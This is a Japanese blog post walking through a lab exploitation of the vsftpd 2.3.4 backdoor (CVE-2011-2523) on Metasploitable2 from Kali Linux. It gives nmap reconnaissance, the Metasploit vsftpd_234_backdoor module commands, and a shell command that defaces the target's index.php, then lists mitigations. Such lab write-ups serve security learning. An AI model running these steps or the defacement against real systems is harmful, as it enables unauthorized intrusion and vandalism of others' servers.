1
3

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

CVE-2011-2523の脆弱性を検証する

Posted at

注意

必ずローカル環境で検証してください。

環境

攻撃者

  • Kali Linux

ターゲット

  • Metasploitable2

CVE-2011-2523について

vsftpdのバージョン2.3.4のソースファイル「vsftpd-2.3.4.tar.gz」にリモートから任意のコードの実行を可能にするバックドアコードが含まれていた。
「:)」含むユーザー名でFTP接続した際にバックドアポートであるTCP6200番がオープンし、バックドアポートにリモートから接続すると任意のコマンドが実行可能になっている。

偵察

Nmapコマンドでポートスキャンを実行する。

nmap -sV <target ip address>

-sVオプションでサービスとバージョンを検出できる。
-Aオプションでも可。

-sVオプションの場合

nmap_scann.png

-Aオプションの場合

scan_with_Aoption.png

vsftpd/2.3.4が動いているのが確認できる。

攻撃準備

Metasploitを起動。

msfconsole

msfconsole.png

Metasploit Frameworkが起動した。

vsftpd/2.3.4の脆弱性を探す。

msf6 > search vsftpd 2.3.4

metasploit_search.png

バックドアの脆弱性がヒットしたのでこれを使用する。

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

攻撃に必要な設定を確認する。

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

showoptin.png

Requiredの値がyesになっている項目が必須。
今回はデフォルトで宛先ポート(RPOT)が21になっているため、宛先ホスト(RHOSTS)を指定する。

宛先ホストを指定。

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST <target ip address>

もう一度show optionsで設定項目を確認すると宛先ホストがセットされていることが確認できる。

set_show.png

攻撃

準備が整ったので攻撃する。

msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

run.png

runexploitで攻撃の実行。

侵入完了です。

success.png

とりあえず、Webサイトでも改ざんしておきます。

echo "Hacked! Success! by kk0128jp" >> /var/www/index.php

web_hacked.png

対策

TCPポート6200番が不当にオープンしていないか確認する。
外部からFTPサーバの不要なポートに接続できないようにアクセス制御を実施。
vsftpdをアップデートするのが一番かな。

おまけ

今回使用した攻撃モジュールのソースコードを確認したい方はこちらに。

参考サイト

1
3
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
1
3

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?